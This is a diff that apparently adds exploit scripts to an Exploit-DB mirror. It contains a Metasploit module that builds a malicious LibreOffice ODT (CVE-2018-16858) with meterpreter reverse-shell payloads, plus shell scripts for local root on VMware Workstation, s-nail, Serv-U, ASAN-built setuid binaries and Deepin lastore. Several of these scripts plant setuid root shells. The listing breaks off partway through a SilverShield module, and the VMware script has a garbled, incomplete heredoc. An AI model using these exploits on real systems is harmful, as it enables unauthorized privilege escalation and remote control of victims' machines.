+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreOffice Macro Code Execution',
+      'Description'    => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them. A macro can be tied
+        to a program event by including the script that contains the macro and
+        the function name to be executed. Additionally, a directory traversal
+        vulnerability exists in the component that references the Python script
+        to be executed. This allows a program event to execute functions from Python
+        scripts relative to the path of the samples macros folder. The pydoc.py script
+        included with LibreOffice contains the tempfilepager function that passes
+        arguments to os.system, allowing RCE.
+
+        This module generates an ODT file with a mouse over event that
+        when triggered, will execute arbitrary code.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Alex Inführ', # Vulnerability discovery and PoC
+        'Shelby Pace'  # Metasploit Module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-16858' ],
+          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
+        ],
+      'Platform'       => [ 'win', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        =>  'win',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'Payload'         =>  'windows/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependFork' =>  true },
+              'CmdStagerFlavor' =>  'printf',
+            }
+          ]
+        ],
+      'DisclosureDate'  =>  "Oct 18, 2018",
+      'DefaultTarget'   =>  0
+    ))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
+    ])
+  end
+
+  def gen_windows_cmd
+    opts =
+    {
+      :remove_comspec       =>  true,
+      :method               =>  'reflection',
+      :encode_final_payload =>  true
+    }
+    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
+    @cmd << ' && echo'
+  end
+
+  def gen_linux_cmd
+    @cmd = generate_cmdstager.first
+    @cmd << ' && echo'
+  end
+
+  def gen_file(path)
+    text_content = Rex::Text.rand_text_alpha(10..15)
+
+    # file from Alex Inführ's PoC post referenced above
+    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
+    libre_file = ERB.new(fodt_file).result(binding())
+    libre_file
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, 'Cannot find template file')
+  end
+
+  def exploit
+    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
+    if datastore['TARGET'] == 0
+      gen_windows_cmd
+    elsif datastore['TARGET'] == 1
+      gen_linux_cmd
+    else
+      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
+    end
+    fodt_file = gen_file(path)
+
+    file_create(fodt_file)
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/local/47171.sh b/exploits/multiple/local/47171.sh
new file mode 100755
index 000000000..89da278a0
--- /dev/null
+++ b/exploits/multiple/local/47171.sh
@@ -0,0 +1,128 @@
+#!/bin/bash
+################################################################################
+# VMware Workstation Local Privilege Escalation exploit (CVE-2017-4915)        #
+#  - https://www.vmware.com/security/advisories/VMSA-2017-0009.html            #
+#  - https://www.exploit-db.com/exploits/42045/                                #
+#                                                                              #
+# Affects:                                                                     #
+#  - VMware Workstation Player <= 12.5.5                                       #
+#  - VMware Workstation Pro <= 12.5.5                                          #
+################################################################################
+# ~ bcoles
+
+VM_PLAYER=/usr/bin/vmplayer
+GCC=/usr/bin/gcc
+
+RAND_STR=$(echo $RANDOM | tr '[0-9]' '[a-zA-Z]')
+VM_DIR=$HOME/.$RAND_STR
+
+echo "[*] Creating directory $VM_DIR"
+
+mkdir "$VM_DIR"
+
+if [ $? -ne 0 ] ; then
+  echo "[-] Could not create $VM_DIR"
+  exit 1
+fi
+
+echo "[*] Writing $VM_DIR/$RAND_STR.c"
+
+cat > "$VM_DIR/$RAND_STR.c" <<EOL
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/prctl.h>
+#include <err.h>
+extern char *program_invocation_short_name;
+__attribute__((constructor)) void run(void) {
+  uid_t ruid, euid, suid;
+  if (getresuid(&ruid, &euid, &suid))
+    err(1, "getresuid");
+  printf("[*] Current UIDs: %d %d %d\n", ruid, euid, suid);
+  if (ruid == 0 || euid == 0 || suid == 0) {
+    if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
+      err(1, "setresxid");
+    printf("switched to root UID and GID");
+    system("/bin/bash");
+    _exit(0);
+  }
+}
+EOL
+
+echo "[*] Compiling $VM_DIR/$RAND_STR.c"
+
+$GCC -shared -o "$VM_DIR/$RAND_STR.so" "$VM_DIR/$RAND_STR.c" -fPIC -Wall -ldl -std=gnu99
+
+if [ $? -ne 0 ] ; then
+  echo "[-] Compilation failed"
+  exit 1
+fi
+
+echo "[*] Removing $VM_DIR/$RAND_STR.c"
+rm "$VM_DIR/$RAND_STR.c"
+
+echo "[*] Writing $HOME/.asoundrc"
+  lib "$VM_DIR/$RAND_STR.so"
+  func "conf_pulse_hook_load_if_running"
+}
+EOL
+
+echo "[*] Writing $VM_DIR/$RAND_STR.vmx"
+
+cat > "$VM_DIR/$RAND_STR.vmx" <<EOL
+.encoding = "UTF-8"
+config.version = "8"
+virtualHW.version = "8"
+scsi0.present = "FALSE"
+memsize = "4"
+ide0:0.present = "FALSE"
+sound.present = "TRUE"
+sound.fileName = "-1"
+sound.autodetect = "TRUE"
+vmci0.present = "FALSE"
+hpet0.present = "FALSE"
+displayName = "$RAND_STR"
+guestOS = "other"
+nvram = "$RAND_STR.nvram"
+virtualHW.productCompatibility = "hosted"
+gui.exitOnCLIHLT = "FALSE"
+powerType.powerOff = "soft"
+powerType.powerOn = "soft"
+powerType.suspend = "soft"
+powerType.reset = "soft"
+floppy0.present = "FALSE"
+monitor_control.disable_longmode = 1
+EOL
+
+echo "[*] Disabling VMware hint popups"
+
+if [ ! -d "$HOME/.vmware" ]; then
+  mkdir "$HOME/.vmware"
+fi
+
+if [ -f "$HOME/.vmware/preferences" ]; then
+  if grep -qi "hints.hideall" "$HOME/.vmware/preferences"; then
+    sed -i 's/hints\.hideAll\s*=\s*"FALSE"/hints.hideAll = "TRUE"/i' "$HOME/.vmware/preferences"
+  else
+    echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences"
+  fi
+else
+  echo '.encoding = "UTF8"' > "$HOME/.vmware/preferences"
+  echo 'pref.vmplayer.firstRunDismissedVersion = "999"' >> "$HOME/.vmware/preferences"
+  echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences"
+fi
+
+echo "[*] Launching VMware Player..."
+$VM_PLAYER "$VM_DIR/$RAND_STR.vmx"
+
+echo "[*] Removing $HOME/.asoundrc"
+rm "$HOME/.asoundrc"
+
+echo "[!] Remove $VM_DIR when you're done"
+rmdir "$VM_DIR"
+
+################################################################################
+# EOF
\ No newline at end of file
diff --git a/exploits/multiple/local/47172.sh b/exploits/multiple/local/47172.sh
new file mode 100755
index 000000000..dde5da88f
--- /dev/null
+++ b/exploits/multiple/local/47172.sh
@@ -0,0 +1,360 @@
+#!/bin/sh
+# Wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899
+# uses ld.so.preload technique
+# ---
+# [~] Found privsep: /usr/lib/s-nail/s-nail-privsep
+# [.] Compiling /var/tmp/.snail.so.c ...
+# [.] Compiling /var/tmp/.sh.c ...
+# [.] Compiling /var/tmp/.privget.c ...
+# [.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
+# [=] s-nail-privsep local root by @wapiflapi
+# [.] Started flood in /etc/ld.so.preload
+# [.] Started race with /usr/lib/s-nail/s-nail-privsep
+# [.] This could take a while...
+# [.] Race #1 of 1000 ...
+# This is a helper program of "s-nail" (in /usr/bin).
+#   It is capable of gaining more privileges than "s-nail"
+#   and will be used to create lock files.
+#   It's sole purpose is outsourcing of high privileges into
+#   fewest lines of code in order to reduce attack surface.
+#   It cannot be run by itself.
+# [.] Race #2 of 1000 ...
+# ...
+# ...
+# ...
+# [.] Race #9 of 1000 ...
+# [+] got root! /var/tmp/.sh (uid=0 gid=0)
+# [.] Cleaning up...
+# [+] Success:
+# -rwsr-xr-x 1 root root 6336 Jan 13 20:42 /var/tmp/.sh
+# [.] Launching root shell: /var/tmp/.sh
+# # id
+# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(test)
+# ---
+# <bcoles@gmail.com>
+# https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
+
+base_dir="/var/tmp"
+rootshell="${base_dir}/.sh"
+privget="${base_dir}/.privget"
+lib="${base_dir}/.snail.so"
+
+if test -u "${1}"; then
+  privsep_path="${1}"
+elif test -u /usr/lib/s-nail/s-nail-privsep; then
+  privsep_path="/usr/lib/s-nail/s-nail-privsep"
+elif test -u /usr/lib/mail-privsep; then
+  privsep_path="/usr/lib/mail-privsep"
+else
+  echo "[-] Could not find privsep path"
+  exit 1
+fi
+echo "[~] Found privsep: ${privsep_path}"
+
+if ! test -w "${base_dir}"; then
+  echo "[-] ${base_dir} is not writable"
+  exit 1
+fi
+
+echo "[.] Compiling ${lib}.c ..."
+
+cat << EOF > "${lib}.c"
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+
+void init(void) __attribute__((constructor));                                                             
+
+void __attribute__((constructor)) init() {
+  if (setuid(0) || setgid(0))
+    _exit(1);
+
+  unlink("/etc/ld.so.preload");
+
+  chown("${rootshell}", 0, 0);
+  chmod("${rootshell}", 04755);
+  _exit(0);
+}
+EOF
+
+if ! gcc "${lib}.c" -fPIC -Wall -shared -s -o "${lib}"; then
+  echo "[-] Compiling ${lib}.c failed"
+  exit 1
+fi
+
+/bin/rm "${lib}.c"
+
+echo "[.] Compiling ${rootshell}.c ..."
+
+cat << EOF > "${rootshell}.c"
+#include <stdio.h>
+#include <sys/types.h>
+#include <unistd.h>
+int main(void)
+{
+  setuid(0);
+  setgid(0);
+  execl("/bin/sh", "sh", NULL);
+}
+EOF
+
+if ! gcc "${rootshell}.c" -fPIC -Wall -s -o "${rootshell}"; then
+  echo "[-] Compiling ${rootshell}.c failed"
+  exit 1
+fi
+
+/bin/rm "${rootshell}.c"
+
+cat << EOF > "${privget}.c"
+/*
+** 26/01/2016: s-nail-privsep local root by @wapiflapi
+** The setuid s-nail-privsep binary has a directory traversal bug.
+** This lets us be owner of a file at any location root can give us one,
+** only for a very short time though. So we have to race a bit :-)
+** Here we abuse the vuln by creating a polkit policy letting us call pkexec su.
+**
+** gcc s-nail-privget.c -o s-nail-privget
+**
+** # for ubuntu:
+** ./s-nail-privget /usr/lib/s-nail/s-nail-privsep
+** # for archlinux:
+** ./s-nail-privget /usr/lib/mail-privsep
+** ---
+** Original exploit: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
+** Updated by <bcoles@gmail.com> to use ldpreload technique
+** https://github.com/bcoles/local-exploits/tree/master/CVE-2017-5899
+*/
+
+#define _GNU_SOURCE
+
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <fcntl.h>
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ROOTSHELL "${rootshell}"
+#define ITERATIONS 1000
+
+/*
+** Attempts to copy data to target quickly...
+*/
+static pid_t flood(char const *target, char const *data, size_t len) {
+  pid_t child;
+
+  if ((child = fork()) != 0)
+    return child;
+
+  if (nice(-20) < 0) {
+    dprintf("[!] Failed to set niceness");
+  }
+
+  while (1) {
+    int fd;
+
+    if ((fd = open(target, O_WRONLY)) < 0) {
+      continue;
+    }
+
+    write(fd, data, len);
+    close(fd);
+
+    usleep(10);
+  }
+
+  return child;
+}
+
+/*
+** This triggers the vulnerability. (a lot.)
+*/
+static pid_t race(char const *path, char const *target) {
+  pid_t child;
+
+  if ((child = fork()) != 0)
+    return child;
+
+  char *argv[] = {
+    NULL, "rdotlock",
+    "mailbox",	NULL, // \$TMPDIR/foo
+    "name",	NULL, // \$TMPDIR/foo.lock
+    "hostname",	"spam",
+    "randstr",	NULL, // eggs/../../../../../../..\$TARGET
+    "pollmsecs","0",
+    NULL
+  };
+
+  char tmpdir[] = "/tmp/tmpdir.XXXXXX";
+  char *loldir;
+
+  int fd, pid, inpipe[2], outpipe[2];
+
+  if (!mkdtemp(tmpdir)) {
+    dprintf("[-] mkdtemp(%s)", tmpdir);
+    exit(EXIT_FAILURE);
+  }
+
+  if (!(argv[0] = strrchr(path, '/'))) {
+    dprintf("[-] %s is not full path to privsep.", path);
+    exit(EXIT_FAILURE);
+  }
+  argv[0] += 1; // skip '/'.
+
+  // (nope I'm not going to free those later.)
+  if (asprintf(&loldir, "%s/foo.lock.spam.eggs", tmpdir) < 0 ||
+      asprintf(&argv[3], "%s/foo", tmpdir) < 0 ||
+      asprintf(&argv[5], "%s/foo.lock", tmpdir) < 0 ||
+      asprintf(&argv[9], "eggs/../../../../../../..%s", target) < 0) {
+    dprintf("[-] asprintf() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  // touch \$tmpdir/foo
+  if ((fd = open(argv[3], O_WRONLY | O_CREAT, 0640)) < 0) {
+    dprintf("[-] open(%s) failed\n", argv[3]);
+    exit(EXIT_FAILURE);
+  }
+  close(fd);
+
+  // mkdir \$tmpdir/foo.lock.spam.eggs
+  if (mkdir(loldir, 0755) < 0) {
+    dprintf("[-] mkdir(%s) failed\n", loldir);
+    exit(EXIT_FAILURE);
+  }
+
+  // OK, done setting up the environment & args.
+  // Setup some pipes and let's get going.
+  if (pipe(inpipe) < 0 || pipe(outpipe) < 0) {
+    dprintf("[-] pipe() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  close(inpipe[1]);
+  close(outpipe[0]);
+
+  while (1) {
+    if ((pid = fork()) < 0) {
+      dprintf("[!] fork failed\n");
+      continue;
+    } else if (pid) {
+      waitpid(pid, NULL, 0);
+      continue;
+    }
+
+    // This is the child, give it the pipes it wants. (-_-')
+    if (dup2(inpipe[0], 0) < 0 || dup2(outpipe[1], 1) < 0) {
+      dprintf("[-] dup2() failed\n");
+      exit(EXIT_FAILURE);
+    }
+
+    if (nice(20) < 0) {
+      dprintf("[!] Failed to set niceness");
+    }
+
+    execv(path, argv);
+    dprintf("[-] execve(%s) failed\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  return child;
+}
+
+int main(int argc, char **argv, char **envv) {
+  char payload[] = "${lib}";
+  char const *target = "/etc/ld.so.preload";
+  char const *privsep_path = argv[1];
+  pid_t flood_pid, race_pid;
+  struct stat st;
+
+  if (argc != 2) {
+    dprintf("usage: %s /full/path/to/privsep\n", argv[0]);
+    exit(EXIT_FAILURE);
+  }
+
+  lstat(privsep_path, &st);
+
+  if ((long)st.st_uid != 0) {
+    dprintf("[-] privsep path is not valid: %s\n", privsep_path);
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[=] s-nail-privsep local root by @wapiflapi\n");
+
+  if ((flood_pid = flood(target, payload, sizeof payload)) == -1) {
+    dprintf("[-] flood() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[.] Started flood in %s\n", target);
+
+  if ((race_pid = race(privsep_path, target)) == -1) {
+    dprintf("[-] race() failed\n");
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("[.] Started race with %s\n", privsep_path);
+  dprintf("[.] This could take a while...\n");
+
+  for (int i = 1; i <= ITERATIONS; i++) {
+    dprintf("[.] Race #%d of %d ...\n", i, ITERATIONS);
+    system(privsep_path);
+    lstat(ROOTSHELL, &st);
+    if ((long)st.st_uid == 0)
+      break;
+  }
+
+  kill(race_pid, SIGKILL);
+  kill(flood_pid, SIGKILL);
+
+  if ((long)st.st_uid != 0) {
+    dprintf("[-] Failed. Not vulnerable?\n");
+    exit(EXIT_FAILURE);
+  }
+  dprintf("[+] got root! %s (uid=%ld gid=%ld)\n", ROOTSHELL, (long)st.st_uid, (long)st.st_gid);
+
+  return system(ROOTSHELL);
+}
+EOF
+
+echo "[.] Compiling ${privget}.c ..."
+
+if ! gcc "${privget}.c" -fPIC -Wall -s -o "${privget}"; then
+  echo "[-] Compiling ${privget}.c failed"
+  exit 1
+fi
+
+/bin/rm "${privget}.c"
+
+echo "[.] Adding ${lib} to /etc/ld.so.preload ..."
+
+echo | $privget "${privsep_path}"
+
+echo '[.] Cleaning up...'
+
+/bin/rm "${privget}"
+/bin/rm "${lib}"
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo "[.] Launching root shell: ${rootshell}"
+$rootshell
\ No newline at end of file
diff --git a/exploits/multiple/local/47173.sh b/exploits/multiple/local/47173.sh
new file mode 100755
index 000000000..1684d970b
--- /dev/null
+++ b/exploits/multiple/local/47173.sh
@@ -0,0 +1,37 @@
+#!/bin/bash
+# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
+# Bash variant of Guy Levin's Serv-U FTP Server exploit:
+# - https://github.com/guywhataguy/CVE-2019-12181
+# ---
+# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot 
+# [*] Launching Serv-U ...
+# sh: 1: : Permission denied
+# [+] Success:
+# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
+# [*] Launching root shell: /tmp/sh
+# sh-4.4# id
+# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
+# ---
+# <bcoles@gmail.com>
+# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
+
+if ! test -u "/usr/local/Serv-U/Serv-U"; then
+  echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
+  exit 1
+fi
+
+echo "[*] Launching Serv-U ..."
+
+/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
+
+if ! test -u "/tmp/sh"; then
+  echo '[-] Failed'
+  /bin/rm "/tmp/sh"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la /tmp/sh
+
+echo "[*] Launching root shell: /tmp/sh"
+/tmp/sh -p
\ No newline at end of file
diff --git a/exploits/multiple/local/47174.sh b/exploits/multiple/local/47174.sh
new file mode 100755
index 000000000..709f68777
--- /dev/null
+++ b/exploits/multiple/local/47174.sh
@@ -0,0 +1,192 @@
+#!/bin/bash
+# unsanitary.sh - ASAN/SUID Local Root Exploit
+# Exploits er, unsanitized env var passing in ASAN
+# which leads to file clobbering as root when executing
+# setuid root binaries compiled with ASAN.
+# Uses an overwrite of /etc/ld.so.preload to get root on
+# a vulnerable system. Supply your own target binary to
+# use for exploitation.
+# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
+# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
+# Released under the Snitches Get Stitches Public Licence.
+# Gr33tz to everyone in #lizardhq and elsewhere <3
+# ~infodox (18/02/2016)
+# FREE LAURI LOVE!
+# ---
+# Original exploit: https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e
+# Updated by <bcoles@gmail.com>
+# - fixed some issues with reliability
+# - replaced symlink spraying python code with C implementation
+# https://github.com/bcoles/local-exploits/tree/master/asan-suid-root
+# ---
+# user@linux-mint-19-2:~/Desktop$ file /usr/bin/a.out 
+# /usr/bin/a.out: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f9f85a5b58074eacd5b01eae970320ed22984932, stripped
+#
+# user@linux-mint-19-2:~/Desktop$ ldd /usr/bin/a.out | grep libasan
+# 	libasan.so.4 => /usr/lib/x86_64-linux-gnu/libasan.so.4 (0x00007f028d427000)
+#
+# user@linux-mint-19-2:~/Desktop$ objdump -x /usr/bin/a.out | grep libasan
+#   NEEDED               libasan.so.4
+#
+# user@linux-mint-19-2:~/Desktop$ ASAN_OPTIONS=help=1 /usr/bin/a.out 2>&1 | grep 'flags for AddressSanitizer'
+# Available flags for AddressSanitizer:
+#
+# user@linux-mint-19-2:~/Desktop$ ./unsanitary.sh /usr/bin/a.out
+# Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)
+# [+] /usr/bin/a.out was compiled with libasan
+# [.] Compiling /tmp/.libhax.c ...
+# [.] Compiling /tmp/.rootshell.c ...
+# [.] Compiling /tmp/.spray.c ...
+# [.] Spraying /home/user/Desktop with symlinks ...
+# [.] Adding /tmp/.libhax.so to /etc/ld.so.preload ...
+# ./unsanitary.sh: line 135: 30663 Aborted                 (core dumped) ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "${target}" > /dev/null 2>&1
+# [.] Cleaning up...
+# [+] Success:
+# -rwsr-xr-x 1 root root 8384 Jan 12 14:21 /tmp/.rootshell
+# [.] Launching root shell: /tmp/.rootshell
+# root@linux-mint-19-2:~/Desktop# id
+# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
+# root@linux-mint-19-2:~/Desktop#
+# ---
+
+rootshell="/tmp/.rootshell"
+lib="/tmp/.libhax"
+spray="/tmp/.spray"
+
+target="${1}"
+log_prefix="$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 12 | head -n 1)___"
+spray_size=100
+
+command_exists() {
+  command -v "${1}" >/dev/null 2>/dev/null
+}
+
+echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
+
+if [[ $# -eq 0 ]] ; then
+    echo "use: $0 /full/path/to/targetbin"
+    echo "where targetbin is setuid root and compiled w/ ASAN"
+    exit 0
+fi
+
+if ! command_exists gcc; then
+  echo '[-] gcc is not installed'
+  exit 1
+fi
+
+if ! test -w .; then
+  echo '[-] working directory is not writable'
+  exit 1
+fi
+
+if ! test -u "${target}"; then
+  echo "[-] ${target} is not setuid"
+  exit 1
+fi
+
+if [[ $(/usr/bin/ldd "${target}") =~ "libasan.so" ]]; then
+  echo "[+] ${target} was compiled with libasan"
+else
+  echo "[!] Warning: ${target} appears to have been compiled without libasan"
+fi
+
+echo "[.] Compiling ${lib}.c ..."
+
+cat << EOF > "${lib}.c"
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+
+void init(void) __attribute__((constructor));
+
+void __attribute__((constructor)) init() {
+  if (setuid(0) || setgid(0))
+    _exit(1);
+
+  unlink("/etc/ld.so.preload");
+
+  chown("${rootshell}", 0, 0);
+  chmod("${rootshell}", 04755);
+  _exit(0);
+}
+EOF
+
+if ! gcc "${lib}.c" -fPIC -shared -ldl -o "${lib}.so"; then
+  echo "[-] Compiling ${lib}.c failed"
+  exit 1
+fi
+/bin/rm -f "${lib}.c"
+
+echo "[.] Compiling ${rootshell}.c ..."
+
+cat << EOF > "${rootshell}.c"
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+int main(void)
+{
+  setuid(0);
+  setgid(0);
+  execl("/bin/bash", "bash", NULL);
+}
+EOF
+
+if ! gcc "${rootshell}.c" -o "${rootshell}"; then
+  echo "[-] Compiling ${rootshell}.c failed"
+  exit 1
+fi
+/bin/rm -f "${rootshell}.c"
+
+echo "[.] Compiling ${spray}.c ..."
+
+cat << EOF > "${spray}.c"
+#include <stdio.h>
+#include <sys/stat.h>
+#include <unistd.h>
+int main(void)
+{
+  pid_t pid = getpid();
+  char buf[64];
+  for (int i=0; i<=${spray_size}; i++) {
+    snprintf(buf, sizeof(buf), "${log_prefix}.%ld", (long)pid+i);
+    symlink("/etc/ld.so.preload", buf);
+  }
+}
+EOF
+
+if ! gcc "${spray}.c" -o "${spray}"; then
+  echo "[-] Compiling ${spray}.c failed"
+  exit 1
+fi
+/bin/rm -f "${spray}.c"
+
+echo "[.] Spraying $(pwd) with symlinks ..."
+
+/bin/rm $log_prefix* >/dev/null 2>&1
+$spray
+
+echo "[.] Adding ${lib}.so to /etc/ld.so.preload ..."
+
+ASAN_OPTIONS="disable_coredump=1 suppressions='/${log_prefix}
+${lib}.so
+' log_path=./${log_prefix} verbosity=0" "${target}" >/dev/null 2>&1
+
+ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "${target}" >/dev/null 2>&1
+
+echo '[.] Cleaning up...'
+/bin/rm $log_prefix*
+/bin/rm -f "${spray}"
+/bin/rm -f "${lib}.so"
+
+if ! test -u "${rootshell}"; then
+  echo '[-] Failed'
+  /bin/rm "${rootshell}"
+  exit 1
+fi
+
+echo '[+] Success:'
+/bin/ls -la "${rootshell}"
+
+echo "[.] Launching root shell: ${rootshell}"
+$rootshell
\ No newline at end of file
diff --git a/exploits/multiple/local/47175.sh b/exploits/multiple/local/47175.sh
new file mode 100755
index 000000000..3d547ccae
--- /dev/null
+++ b/exploits/multiple/local/47175.sh
@@ -0,0 +1,33 @@
+#!/bin/bash
+# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
+#
+# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
+# in the sudo group to install arbitrary packages without providing a password,
+# resulting in code execution as root. By default, the first user created on
+# the system is a member of the sudo group.
+# ~ bcoles
+#
+# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
+#
+echo Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
+echo Building package...
+BASE="/tmp/"
+UUID=$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 32 | head -n 1)
+mkdir "${BASE}${UUID}" && mkdir "${BASE}${UUID}/DEBIAN"
+echo -e "Package: ${UUID}\nVersion: 0.1\nMaintainer: ${UUID}\nArchitecture: all\nDescription: ${UUID}" > ${BASE}${UUID}/DEBIAN/control
+echo -e "#!/bin/sh\ncp /bin/sh ${BASE}/rootsh\nchmod 04755 ${BASE}/rootsh\n" > ${BASE}${UUID}/DEBIAN/postinst
+chmod +x ${BASE}${UUID}/DEBIAN/postinst
+dpkg-deb --build "${BASE}${UUID}"
+echo Installing package...
+dbus-send --system --dest=com.deepin.lastore --type=method_call --print-reply /com/deepin/lastore com.deepin.lastore.Manager.InstallPackage string:"${UUID}" string:"${BASE}${UUID}.deb"
+sleep 10
+echo Removing package...
+dbus-send --system --dest=com.deepin.lastore --type=method_call --print-reply /com/deepin/lastore com.deepin.lastore.Manager.RemovePackage string:" " string:"${UUID}"
+rm -rf "${BASE}${UUID}" "${BASE}${UUID}.deb"
+if [ -f /tmp/rootsh ]
+then
+  echo "Success! Found root shell: /tmp/rootsh"
+  /tmp/rootsh
+else
+  echo "Exploit failed! Check /var/log/lastore/daemon.log"
+fi
\ No newline at end of file
diff --git a/exploits/multiple/local/47197.rb b/exploits/multiple/local/47197.rb
new file mode 100755
index 000000000..a34fc710c
--- /dev/null
+++ b/exploits/multiple/local/47197.rb
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Exploit Title: extenua SilverSHielD 6.x local priviledge escalation
+# Google Dork: na
+# Date: 31 Jul 2019
+# Exploit Author: Ian Bredemeyer
+# Vendor Homepage: https://www.extenua.com
+# Software Link: https://www.extenua.com/silvershield
+# Version: 6.x
+# Tested on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
+# CVE: CVE-2019-13069
+
+# More Info: https://www.fobz.net/adv/ag47ex/info.html
+
+require 'sqlite3'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+require 'tempfile'
+require 'securerandom'
+require 'digest'
+
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Post::File
+  include Msf::Exploit::Remote::SSH
+  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::FileInfo
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'          => 'Extenua SilverSHielD 6.x local privilege escalation',
+      'Description'   => %q{
+        Extenua SilverShield 6.x fails to secure its ProgramData subfolder.
+        This module exploits this by injecting a new user into the database and then
+        using that user to login the SSH service and obtain SYSTEM. 
+        This results in to FULL SYSTEM COMPROMISE. 
+        At time of discolsure, no fix has been issued by vendor.
+      },
+      'Author'        => [
+        'Ian Bredemeyer',
+        ],
+      'Platform'      => [ 'win','unix' ],  # 'unix' is needed, otherwise the Payload is flagged as incompatible
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+        [ 'Universal', {} ],
+      ],
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultTarget' => 0,
+      'References'    => [
+        [ 'CVE', '2019-13069' ],
+        [ 'URL', 'https://www.fobz.net/adv/ag47ex/info.html' ],
+        [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13069' ]
+      ],
